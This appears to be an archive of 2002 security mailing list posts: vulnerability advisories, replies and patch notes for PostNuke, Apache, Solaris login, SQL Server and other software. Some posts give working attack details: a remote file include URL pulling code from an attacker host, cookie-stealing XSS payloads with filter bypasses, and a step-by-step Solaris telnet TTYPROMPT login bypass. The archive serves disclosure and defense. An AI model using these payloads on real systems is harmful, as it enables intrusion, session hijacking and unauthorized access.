phpMyNewsletter

[Frog Man]

Informations :
°°
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
°°
 /include/customize.php 

 /include/customize.php 


Exploit :
°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :


or
http://[target]/include/customize.php?l=../path/file/to/view


Patch :
°°°
Autor has been alerted and last version (0.7beta1) has been patched.


More details
- in french :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n

The Books Module for the PostNuke CMS XSS Vulnerability

[Pistone]

- 
Class : input Validation Error

Risk :Due to the simplicity of the attack and the number of sites
   that run module books the risk is classified as Medium to  
   High.

URL: Http://pn-mod-books.sourceforge.net
- 
This Books module version v0.54 is running as a Mutant (PN 0.64) 
This Books module version v0.6  is running as a Rogue (PN 0.7)
- 

Exploit:
   
http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|

Change | x <>


- ---
Programmer of Books module receives a copy this report.
- 


Salu2

Pistone
- - 
Http://www.gauchohack.com.ar
Http://www.hackindex.org

iDEFENSE Security Advisory 10.03.2002: Apache 1.3.x shared memory scoreboard vulnerabilities

[David Endler]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

iDEFENSE Security Advisory 10.03.2002
Apache 1.3.x shared memory scoreboard vulnerabilities

16:00 GMT, October 3, 2002


I. BACKGROUND

The Apache Software Foundation's HTTP Server is an effort to develop
and maintain an open-source HTTP server for modern operating systems
including Unix and Windows NT. The goal of this project is to provide
a secure, efficient and extensible server that provides HTTP services
in sync with the current HTTP standards.  More details about it are
available at http://httpd.apache.org .

II. DESCRIPTION

Apache HTTP Server contains a vulnerability in its shared memory
scoreboard. Attackers who can execute commands under the Apache UID
can either send a (SIGUSR1) signal to any process as root, in most
cases killing the process, or launch a local denial of service (DoS)
attack.

III. ANALYSIS

Exploitation requires execute permission under the Apache UID. This
can be obtained by any local user with a legitimate Apache scripting
resource (ie: PHP, Perl), exploiting a vulnerability in web-based
applications written in the above example languages, or through the
use of some other local/remote Apache exploit.

Once such a status is attained, the attacker can then attach to the
httpd daemon's 'scoreboard', which is stored in a shared memory
segment owned by Apache. The attacker can then cause a DoS condition
on the system by continuously filling the table with null values and
causing the server to spawn new children. 

The attacker also has the ability to send any process a SIGUSR1
signal as root. This is accomplished by continuously overwriting the
parent[].pid and parent[].last_rtime segments within the scoreboard
to the pid of the target process and a time in the past. When the
target pid receives the signal SIGUSR1, it will react according to
how it is designed to manage the signal. According to the man page
(man 7 signal), if the signal is un-handled then the default action
is to terminate:

 ...
 SIGUSR1 30,10,16 A User-defined signal 1
 ...
 The letters in the "Action" column have the following meanings:

 A Default action is to terminate the process.
 ...

iDEFENSE successfully terminated arbitrary processes, including those
that "kicked" people off the system.

IV. DETECTION

Apache HTTP Server 1.3.x, running on all applicable Unix platforms,
is affected.

V. VENDOR FIX/RESPONSE

Apache HTTP Server 1.3.27 fixes this problem. It should be available
on October 3 at http://www.apache.org/dist/httpd/ . 

VI. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification number CAN-2002-0839 to this issue.

VII. DISCLOSURE TIMELINE

8/27/2002   Issue disclosed to iDEFENSE
9/18/2002   Vendor notified at [EMAIL PROTECTED]
9/18/2002   iDEFENSE clients notified
9/19/2002   Response received from Mark J Cox ([EMAIL PROTECTED])
10/3/2002   Coordinated public disclosure

VIII. CREDIT

zen-parse ([EMAIL PROTECTED]) disclosed this issue to iDEFENSE.


Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to [EMAIL PROTECTED], subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. iALERT, our security intelligence service,
provides decision-makers, frontline security professionals and
network administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

[EMAIL PROTECTED]
www.idefense.com

-BEGIN PGP SIGNATURE-
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPZx0I0rdNYRLCswqEQIowQCfQT+FYR1FLTEzlf49SpJXwDnie8wAn3Kr
CncduGV6EYHqVayQE90b7Yij
=4T8j
-END PGP SIGNATURE-

Re: Postnuke XSS fixed

[Muhammad Faisal Rauf Danka]

I just checked it again :

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);

where + denotes a blank space or similarly this one:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=alert(document.cookie);

resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg.

However the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);

or any character inserted before first "script" and after first less than "<" 
resulting in DB Error, revealing nothing (user/pass/path etc).

But I used I.E and Netscape, maybe it's different with other browsers. :)

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202


--- Daniel Woods <[EMAIL PROTECTED]> wrote:
>
>Humm!
>
>> on 26th Sep the following url:
>> http://news.postnuke.com/modules.php
>>  
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work Keep it up! :)
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
>  http://news.postnuke.com/modules.php
> 
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>
>Using the request...
> 
>?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);
>gives me the DB Error: message
>
>And using the request...
> 
>?op=modload&name=News&file=article&sid=alert(document.cookie);
>gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.
>
>Thanks... Dan.

_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---

_
Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, 
POP & more! http://www.everyone.net/selectmail?campaign=tag

Re: iDEFENSE Security Advisory 10.02.2002: Net-SNMP DoSVulnerability

[Wes Hardaker]

> On Wed, 2 Oct 2002 16:14:45 -0400, "David Endler" <[EMAIL PROTECTED]> said:

David> This issue potentially affects any Net-SNMP installation in
David> which the "public" read-only community string has not been
David> changed.

net-snmp does not release packages with a pre-configured public
community string.  Various vendors (RedHat, etc) however, do.  You'd
have to have intentionally granted public access for it to affect you
if you're using net-snmp.

-- 
"The trouble with having an open mind, of course, is that people will
 insist on coming along and trying to put things in it."   -- Terry Pratchett

Re: Postnuke XSS issues [correction]

[Brian E]

In-Reply-To: <[EMAIL PROTECTED]>

>As it turns out the Postnuke issue in particular is a red herring.
>
>As the lead developer describes it -- the cookie generated is a local
>site cookie that is sandboxed within the confines of the
>browser/session.
>
>It is not the remote user's cookie.

The correction posted here on BugTraq is false.  The vulnerability exists 
with PostNuke .72.  I expect this exists for previous versions as well but 
have not tested. 

I have used the sample exploit URL against my own PN .72 system. 

1.  Close all instances of IE. 
2.  Use the url against my site.  The session ID is displayed in the popup 
(the script is embeded in the the HTML source). 
3.  View my site database in MySQL.  NUKE_SESSION_INFO table contains an 
active session ID (pn_sessid field).  No user is associated with this 
session ID (i.e. pn_uid=0). 
4.  Logon to my site.  Provide a userid and password.
5.  View my site database in MySQL.  NUKE_SESSION_INFO table contains an 
active session ID (as displayed in #3).  The userid I used to logon to my 
site (from #4) is now associated with this session ID. 
5.  Use the url against my site.  The session ID is displayed in the popup 
(the script is embeded in the HTML source).  This is the same session ID 
displayed in #1 and represents the authentication token for the user (user 
account used in #4).  An attacker who successfully obtains this 
information could hijack the valid session and assume the identity and 
privileges of the user from #4. 

This process has been simplified and does not reflect multiple instances 
of IE (which could have unique or shared session ID's). 

Yes, PN may use a sandbox environment if the user has not logged into the 
site yet.  However, if the user logs on before or after this vulnerability 
is exploited it becomes more serious. 

1.  If an attacker obtains (and explots) a valid session ID of a regular 
user, the damage caused to the site would would likely be minimal.  
However, the user may experiance embarassment or some loss of reputation 
as someone could have impersonated them and posted comments as the user. 
2.  If an attacker obtains (and exploits) a valids session ID of a 
postnuke moderator or other privileged user (i.e. postnuke admin), the 
damage caused to the site would be greater than #1.  This user may be able 
to alter the configuration of the postnuke application or affect data that 
appears on the site to other users.  This would not allow direct access to 
the MySQL database or file system.  Damage to user is same as #1. 

A postnuke admin can protect the site by timing out session ID's when no 
longer in use. 

A user can protect themself by logging out of the application, don't just 
close the browser. 

I would also argue that if a user's actions are not monitored, they will 
go undetected.  Will a driver run through a red light if they are stopped 
on a deserted road with no one around?  What about if that driver see's 
they are being watched by a camera?  Yes, the web server may be logging 
requests but these records do not easily or directly show what action a 
particular user performed.  In my opinion, individual user accountability 
in PostNuke is not achieved.  Knowing that actions may go undetected, a 
user may be further tempted to try exploiting vulnerabilities. 


Regards, 
Brian, CISSP 

Re: Solaris 2.6, 7, 8

[Gert-Jan Hagenaars]

Apparently, Dave Ahmad wrote:
% 
% These may be fixes for this vulnerablity, however they apply to telnetd
% and this vulnerability has to be in login.

So it makes more sense to apply the right patches to login, and not
patches to telnetd.  If you only want to install the necessary patches
to plug this specific hole, very quickly, use these:

solaris 8 login fix: 111085-02
solaris 7 login fix: 112300-01
solaris 2.6 login fix: 105665-04
solaris 2.5.1 login fix: 106160-02

use patchadd.  A reboot is not necessary.

During your normal maintenance window you should install the rest of the
recommended patches.

CHeers,
Gert-Jan.

-- 
+  + --- ++ - +0+ + ++ +++ +  +
sed '/^[when][coders]/!d G.J.W. Hagenaars -- gj at hagenaars dot com
/^...[discover].$/d  Remembering Mike Carty 1968-1994
   /^..[real].[code]$/!d UltrixIrixAIXHPUXSunOSLinuxBSD, nothing but nix
' /usr/dict/wordsI'm Dutch, what's _your_ excuse?

Re: [VulnDiscuss] XSS bug in Compaq Insight Manager Http server

[sullo]

It may be worth noting that the 2.0 and 2.1 releases are also
vulnerable, however 1.0 does not seem to be (getting worse, as 4.x
introduces a drop-down list of user names to choose from as well). 
Also, it runs on some systems on port 49400 and https on 2381 (as well
as the 2301 mentioned below).

As for a "3rd party software tool" flagging all web servers as
vulnerable, well... I can only answer for Nikto, but yes indeed it will
report a vulnerable system as vulnerable, as it does with the Compaq
server. Exploiting for "value" is another discussion entirely, but I do
get a nice popup by injecting javascript.

-Sullo

Taylor Huff wrote:
> Advisory name: XSS bug in Compaq Insight Manager Http server
> Application: Compaq Insight Manager Http server
> Date: 01.10.2002
> Impact: XSS code execution
> 
> [DESCRIPTION]
> XSS bug in Compaq Insight Manager Http server
> 
> [ISSUE]
> The Compaq Insight Manager Http server is vulnerable to the Cross Site 
> Scripting (XSS) vulnerability.  This vulnerability is caused by the 
> results returned to a user when a non-existing file is requested.  The 
> vulnerability would allow an attacker to make the server present another 
> user with malicious JavaScript/HTML code that is interpreted and 
> executed without the users knowledge (e.g. the result contains the 
> JavaScript provided in the request).  This vulnerability was identified 
> with a popular open-source vulnerability assessment tool and confirmed 
> using the following XSS test.
> 
> [XSS TEST]
> http://:2301/alert('Test')
> 
> [VERSIONS TESTED]
> CompaqHTTPServer/4.2
> CompaqHTTPServer/4.37
> 
> [SUPPORTING INFO]
> http://www.cert.org/advisories/CA-2000-02.html
> 
> [VENDOR RESPONSE]
> There is a 3rd party software tool that can be used for security 
> assessments that flags any web server as potentially having this 
> problem. Our web servers do not, to our knowledge, have this 
> vulnerability. We have investigated it but it is a non-issue for us. 
> This issue is just a 'potential vulnerability' rather than a 'for sure' 
> problem. In other words, the tool is guessing that all web servers can 
> have this problem.
> 
> Thank You,
> HP E-Services


___
http://www.cirt.net/
Home of Nikto

Re: Kondara MNU/Linux

[Shin SHIRAHATA]

Hi.

On June 28th, DigitalFactory has alienate part of linux
business. And now, SP, Inc. is selling Kondara MNU/Linux.

Press release from DigitalFactory (Japanese Language Only):
http://www.digitalfactory.co.jp/news/press/020628.html

After that, Kondara Project, which is development project of
Kondara MNU/Linux was winding up. and Kodara.org's server has
been shutdown on July 15th.

P.S.
Some people of Kondara Project were launched new project called
Momonga Linux. This project has no relationship with Kondara.
Momonga Linux is still in underdevelopment, 
For mode details, please visit http://www.momonga-linux.org/

> Kondara MNU/Linux's primary web/ftp sites have been down for over a month
> now. Can anyone confirm that the company is still in operation, I have had
> no luck in contacting them. They still appear to sell several of their
> products via DigitalFactory, but they do not appear to be supported any
> longer (i.e. no security updates in a month+).

---
Shin SHIRAHATA <[EMAIL PROTECTED]>
KEIO University / WIDE Project

Re: Solaris 2.6, 7, 8

[Ramon Kagan]

Another thing,  if you tcpwrap your telnet sessions, you can prevent
localhost telnets.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

-
I have not failed.  I have just
found 10,000 ways that don't work.
- Thomas Edison
-

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: [EMAIL PROTECTED]
>
>

Re: [VulnWatch] Notes on the SQL Cumulative patch

[Dave Aitel]

People in Immunity's Vulnerability Disclosure Club or people who have
purchased CORE Impact or people who have written their own SQL Server
Hello exploit can verify that this statement from the Microsoft Advisory
is, in fact, completely untrue.

The default install, in fact, every install I've run into, gives you
LOCAL/SYSTEM. LOCAL/SYSTEM usually has significant privileges. 

Dave Aitel
Immunity, Inc.

"Unchecked buffer in SQL Server 2000 authentication function
(CAN-2002-1123):

What’s the scope of this vulnerability?

This is a buffer overrun vulnerability. By sending a specially malformed
login request to an affected server, an attacker could either cause the
SQL Server service to fail or gain control over the database. It would
not be necessary for the user to successfully authenticate to the server
in order to exploit the vulnerability.

This vulnerability only affects SQL Server 2000 and MSDE 2000. Although
the vulnerability would provide a way to gain control over the database,
it would not, under default conditions, grant the attacker significant
privileges at the operating system level. "

On Thu, 2002-10-03 at 10:56, David Litchfield wrote:
> The cumulative patch at
> http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS
> 02-056.asp addresses 4 vulnerabilities in SQL Server 7 and 2000. Dave
> Aitel's (www.immunitysec.com) "hello" bug (unauthenticated  buffer overflow
> during authentication) is patched here.
> 
> Also addressed is the file overwrite vulnerability discussed here
> http://www.nextgenss.com/advisories/mssql-jobs2.txt
> 
> The Microsoft advisory states that "operating system" commands can be
> inserted into files - the implication being that batch files can be dropped
> into startup folders. This is not true for SQL Server 2000. The text of the
> file created is UNICODE, i.e. each character taking two bytes with the
> second byte being a NULL. This NULL prevents OS commands from being
> executed. The risk posed to SQL Server 2000 systems then is file overwrite
> such as ntoskrnl.exe
> 
> Please note that I have not tested this on SQL Server 7 and what MS says may
> be true about being able to run OS commands on this version - I have a
> feeling it is not, though.
> 
> It is important that the patch be installed as soon as is possible to fix
> Dave Aitel's issue but for the file overwrite issue drop public access from
> the relevant stored procedures in the interim as a workaround:
> 
> revoke execute on sp_add_job from public
> revoke execute on sp_add_jobstep from public
> revoke execute on sp_add_jobserver from public
> revoke execure on sp_start_job from public
> 
> Cheers,
> David Litchfield
> A check for these issues already exists in NGSSQuirreL
> (http://www.nextgenss.com/software/ngssquirrel.html ) and an update is being
> made now to cover the other two issues.
> 
> 




signature.asc
Description: This is a digitally signed message part

Re: Solaris 2.6, 7, 8

[Marco Ivaldi]

On Wed, 2 Oct 2002, buzheng wrote:

> I do not think this is a new bug.

I completely agree.

> But, the remote setting of TTYPROMPT does matter. you can not succeed in
> login without remotely changing the TTYPROMPT. This is also the bug
> mentioned in Jonathan's original letter (bid:5531).

That's why this bug is not exploitable using remote applications like
rlogin, ssh (at least if you are not crazy enough to enable UseLogin
option) or X.25 pad: rlogin and pad aren't able to pass env vars others
than TERM, while ssh normally don't uses /bin/login for user authentication.

> If you have applied patches for these 2 bugs, you are safe now.
>
> BTW: you can change multiple "c "s to "a=b"s, actually, since SYS V
> login treat " " as environ var separator, you can also use >=64 words
> separated by " " or "\t". they will all work.

Agreed as well.

:raptor
Antifork Research, Inc. ITBH Italian Black Hats
http://www.0xdeadbeef.eu.orghttp://elite.blackhats.it

Notes on the SQL Cumulative patch

[David Litchfield]

The cumulative patch at
http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS
02-056.asp addresses 4 vulnerabilities in SQL Server 7 and 2000. Dave
Aitel's (www.immunitysec.com) "hello" bug (unauthenticated  buffer overflow
during authentication) is patched here.

Also addressed is the file overwrite vulnerability discussed here
http://www.nextgenss.com/advisories/mssql-jobs2.txt

The Microsoft advisory states that "operating system" commands can be
inserted into files - the implication being that batch files can be dropped
into startup folders. This is not true for SQL Server 2000. The text of the
file created is UNICODE, i.e. each character taking two bytes with the
second byte being a NULL. This NULL prevents OS commands from being
executed. The risk posed to SQL Server 2000 systems then is file overwrite
such as ntoskrnl.exe

Please note that I have not tested this on SQL Server 7 and what MS says may
be true about being able to run OS commands on this version - I have a
feeling it is not, though.

It is important that the patch be installed as soon as is possible to fix
Dave Aitel's issue but for the file overwrite issue drop public access from
the relevant stored procedures in the interim as a workaround:

revoke execute on sp_add_job from public
revoke execute on sp_add_jobstep from public
revoke execute on sp_add_jobserver from public
revoke execure on sp_start_job from public

Cheers,
David Litchfield
A check for these issues already exists in NGSSQuirreL
(http://www.nextgenss.com/software/ngssquirrel.html ) and an update is being
made now to cover the other two issues.

[ESA-20021003-023] fetchmail-ssl: buffer overflows and broken boundarychecks.

[EnGarde Secure Linux]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


++
| EnGarde Secure Linux Security AdvisoryOctober 03, 2002 |
| http://www.engardelinux.org/  ESA-20021003-023 |
||
| Package: fetchmail-ssl |
| Summary: buffer overflows and broken boundary checks.  |
++

  EnGarde Secure Linux is a secure distribution of Linux that features
  improved access control, host and network intrusion detection, Web
  based secure remote management, complete e-commerce using AllCommerce,
  and integrated open source security tools.

OVERVIEW
- 
  There are several buffer overflows and broken boundary checks in
  fetchmail.  This update brings fetchmail up to version 6.1.0, fixing
  all known issues.

SOLUTION
- 
  Users of the EnGarde Professional edition can use the Guardian Digital
  Secure Network to update their systems automatically.

  EnGarde Community users should upgrade to the most recent version
  as outlined in this advisory.  Updates may be obtained from:

ftp://ftp.engardelinux.org/pub/engarde/stable/updates/
http://ftp.engardelinux.org/pub/engarde/stable/updates/

  Before upgrading the package, the machine must either:

a) be booted into a "standard" kernel; or
b) have LIDS disabled.

  To disable LIDS, execute the command:

# /sbin/lidsadm -S -- -LIDS_GLOBAL

  To install the updated package, execute the command:

# rpm -Uvh files

  You must now update the LIDS configuration by executing the command:

# /usr/sbin/config_lids.pl

  To re-enable LIDS (if it was disabled), execute the command:

# /sbin/lidsadm -S -- +LIDS_GLOBAL

  To verify the signatures of the updated packages, execute the command:

# rpm -Kv files

UPDATED PACKAGES
- 
  These updated packages are for EnGarde Secure Linux Community
  Edition.

  Source Packages:

SRPMS/fetchmail-ssl-6.1.0-1.0.5.src.rpm
  MD5 Sum: ce52261f9c91b7346cd588a38c86011b

  Binary Packages:

i386/fetchmail-ssl-6.1.0-1.0.5.i386.rpm
  MD5 Sum: 74a23fe3975b6d23ac45fcc865ac

i686/fetchmail-ssl-6.1.0-1.0.5.i686.rpm
  MD5 Sum: f7ac0b8560086169ba39e77c3aeddfcd

REFERENCES
- --
  Guardian Digital's public key:
http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY

  fetchmail's Official Web Site:
http://www.tuxedo.org/~esr/fetchmail/

  Security Contact:   [EMAIL PROTECTED]
  EnGarde Advisories: http://www.engardelinux.org/advisories.html

- --
$Id: ESA-20021003-023-fetchmail-ssl,v 1.2 2002/10/03 12:37:03 rwm Exp $
- --
Author: Ryan W. Maple <[EMAIL PROTECTED]> 
Copyright 2002, Guardian Digital, Inc.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9nDtSHD5cqd57fu0RAgo8AJ40oQGnVzzCicxOhxlRBgASyqxMEgCbBCZT
vYmemdCoH+3SUvR0tRUgQf4=
=Cglq
-END PGP SIGNATURE-

GLSA: python

[Daniel Ahlberg]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT
- - 

PACKAGE        :python
SUMMARY        :os.execvpe() vulnerability
DATE           :2002-10-03 14:45 UTC

- - 

OVERVIEW

By exploiting this vulnerability a local attacker can execute
arbitrary code with the privileges of the user running python code
which uses the execvpe() method.

DETAIL

Zack Weinberg found a vulnerability in the way the exevpe() method
from the os.py module uses a temporary file name. A file which
supposedly should not exist is created in a unsafe way and the method
tries to execute it. The objective of such code is to discover what
error the operating system returns in a portable way.

SOLUTION

It is recommended that all Gentoo Linux users who are running
dev-lang/python-2.2.1-r4 and earlier update their systems
as follows:

emerge rsync
emerge python
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9nFfWfT7nyhUpoZMRAlRIAKChIVtWL75kMwXlt0Ifk5s5seczkgCgiaKZ
t1mU5Nim159c3J9y9dyjELs=
=80ty
-END PGP SIGNATURE-

SSL certificate validation problems in Ximian Evolution

[Veit Wahlich]

Discovered:
2002-09-08, Ximian has been informed on 2002-09-09.

Impact:
medium, if SSL (IMAPS, SMTPS, POP3S) used
none, if not

Affected:
Ximian Evolution 1.0.x and earlier

Description:
Due to missing SSL validation code, Evolution's camel component is
vulnerable to common SSL man-in-the-middle attacks, independent of the
SSL issues currently in discussion. Certificates accepted once are no
longer checked by camel.
The behavior described below has been verified using both self-signed
certificates as well as a regular valid Thawte-signed certificate (but
regarded invalid by camel) for the server and a self-signed certificate
for the attacker. As the valid certificate has been regarded invalid, it
is also needed to be checked out with a certificate from valid oder
valid-made CA. 

Solution:
According to Ximian, Evolution 1.1.x (beta of upcoming 1.2 branch) is no
longer affected, so those people who would like to trust in SSL
connections should consider upgrading.
Ximian has released Evolution 1.1.1.

Exploitation Details:
Imagine e.g. an IMAP connection over SSL. After a connection breakdown,
Evolution quietly re-establishes the IMAPS connection on next access -
but it seems to not check the identity of the peer.
During the time period no connection is established, the certificate is
replaced, e.g. by a SSL m-i-t-m attack, by the attacker's self-signed
certificate, allowing him to read and even modify all data transfered.
The attacker might also setup SSL m-i-t-m filters first and then
drop/kill the connection still established.
Evolution re-establishes the connection without showing any warning
dialog. Using POP3 and SMTPS over the same certificates (and host) does
not postulate any validation as well. 

Regards,
// Veit Wahlich

Buffer Overflow in IE/Outlook HTML Help

[NGS Insight Security Research]

NGSSoftware Insight Security Research Advisory

Name: Windows Help System Buffer Overflow
Systems: Windows XP,2000,NT,ME and 98
Severity: High Risk
Category: Buffer Overflow Vulnerability
Vendor URL: http://www.microsoft.com/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/ms-winhlp.txt
Date: 2nd October 2002
Advisory number: #NISR02102002


Introduction

The Windows Help system includes an ActiveX control known as the HTML Help
Control, hhctrl.ocx. The "Alink" function of this control is vulnerable to a
buffer overflow that can be exploited to gain control of the user's machine.

Details
***
By providing an overly long parameter to the vulnerable function an internal
buffer is overflowed and program control structures can be overwritten
allowing an attacker to remotely gain control of their victims PC. This
could be done by enticing the victim to a website that contained a webpage
that exploits the vulnerability or by sending the victim an HTML mail. When
opened in Outlook the overflow will be triggered.

Fix Information
***
Microsoft have produced a patch which is available from their web site.
More details are available from

http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS
02-055.asp

CommonName Toolbar potentially exposes LAN web addresses

[Eric Stevens]

Due to a bug in the URL validation done in CommonName Toolbar (in at least
dll version 3.5.2.0 on IE 6), addresses from local intranets may be exposed
to the CommonName organization.  It would appear on early evaluation that
valid URLs such as
http://someserver/some/path
are deemed an attempt to locate an organization named "someserver," with
reference to "some path."

The key seems to be the lack of a dot in the server name.

The danger of this is relatively low, only CommonName is exposed to this
information, and other search engines as configured by the user on the
CommonName website, and even then only after a clickthrough on the
CommonName website.  All are reputable organizations, though it does still
represent a breach in data security.

Though danger is low, annoyance factor is high, users are prevented from
accessing their Intranet unless they use a dot-included version of the
server name.

More annoying to me than the bug, and the fact that users here who had it
installed were prevented from actually being able to access our Intranet
servers, however, is that when I turned off all CommonName options, users
were still being directed to the CommonName website on Intranet requests.
Further, in an attempt to allow these users access to our Intranet again, I
closed out of all browsers and uninstalled the CommonName toolbar, restarted
the system, and found that they were still being directed to the CommonName
website on Intranet requests; my best efforts to disable the CommonName
toolbar by supplied mechanisms were futile.

The working solution was to remove all non-administrative access to the
Program Files\CommonName directory, preventing users' IE sessions from being
able to read the DLL's, and finally disabling the CommonNames auto-search
functionality.

As an asside, that caused me to stumble on an idea to proactively protect
yourself from spyware; intentionally install it, or else find out what paths
are used to install it, then deny yourself access to those paths, and even
the sneakiest spyware will be unable to install itself on your system,
unless it chooses random locations and file names.

Further testing with CommonNames toolbar is left as an exercise to those
with out a database due tomorrow (read: the user).

-MightyE

RE: CommonName Toolbar potentially exposes LAN web addresses

[Eric Stevens]

In fact, I noticed the "Resolve Local Intranet Names" option, altering its
setting had no noticeable effect on behavior.

Further, I ran the uninstaller with all other applications closed, and
although the options for CommonName were removed from within Internet
Explorer, local addresses were still being routed to the CommonName website.
Rebooting the machine and attempting to delete the CommonName folder in
Program Files before opening any applications, I was denied the ability as
the Babe DLL was already in use, thus the reason I used ACL's to deny access
to that folder.

-Original Message-
From: Support [mailto:[EMAIL PROTECTED]]
Sent: Thursday, October 03, 2002 11:15 AM
To: Eric Stevens; [EMAIL PROTECTED]
Subject: RE: CommonName Toolbar potentially exposes LAN web addresses


Thank you for your email,

Intranet resolution with CommonName can be activated by opening IE, clicking
on

Tools > Internet Options > Advanced

Then scroll down to the CommonName section and selecting Resolve Local
Intranet Names.

With this feature activated Intranet names are not routed to CommonName for
checking against our database of keywords.

Xerox DocuShare Internal IP address disclosure

[Ryan Purita]

According to the Xerox Corporate Website:
DocuShare lets team members use your corporate 
intranet or extranet to set up a virtual information-sharing environment. Here, users 
can easily post, retrieve, and search for information that resides in familiar nested 
folders. And they can adapt DocuShare to suit the specific needs of any workgroup or 
project. 
DocuShare gives you instant and controlled 
access to information. Read and write permission rights are granted and maintained by 
the workgroup itself. There's no need for a Webmaster to convert documents to HTML or 
PDF before posting or updating information. And users can see at a glance which 
documents are new and revised. 
By default, anonymous users can create an account or group and upload files at will. 
Aside from uploading a malicious HTML document, and potentially exposing unknowing 
users, the internal IP address of the server running DocuShare can also be revealed. 
Using the Upload Helper Utility, it is possible to gain information about the server 
which is hosting DocuShare. 

DS: 192.168.1.13
URL: http://192.168.1.13:80/dscgi/ds.py/ApplyUpload/Collection-10 

Proxy: 
File: Exploit.html (1955967 bytes)
Start 22:12:46 Sep 30, 02
Finish 4507 msec (result code 200)
Terminate 4517 msec since 1st upload

Depending on the Anti-Virus program in use files sent to the server are not checked 
for viruses. When using Trend Micro with the real-time scan enabled and with updated 
virus definitions it did not identify any of the viruses or malicious HTML code that 
was sent.
Tested in Version 2.2 Workgroup (Build 180)

Ryan Purita
Network Security Analyst
Totally Connected Ltd.
1308 S.E. Marine Drive,
Vancouver, B.C., V5X 4K4
[EMAIL PROTECTED]
Phone:  604-432-7828
Fax:604-432-6773

***
   Notice Regarding Confidentiality of Transmission 
***
This message is intended only for the person to which it is addressed and may contain
information that is privileged and confidential.  If you are not the intended 
recipient, you
are hereby notified that any dissemination or copying of this communication is 
prohibited.
Please notify us of the error in communication by telephone (604-432-7828) or by 
return 
e-mail and destroy all copies of this communication. Thank you.
***

Re: Solaris 2.6, 7, 8

[Ramon Kagan]

Sorry but I can't reproduce this on a Solaris 7 machine.

sunlight.ccs% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.


SunOS 5.7

login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
Login incorrect

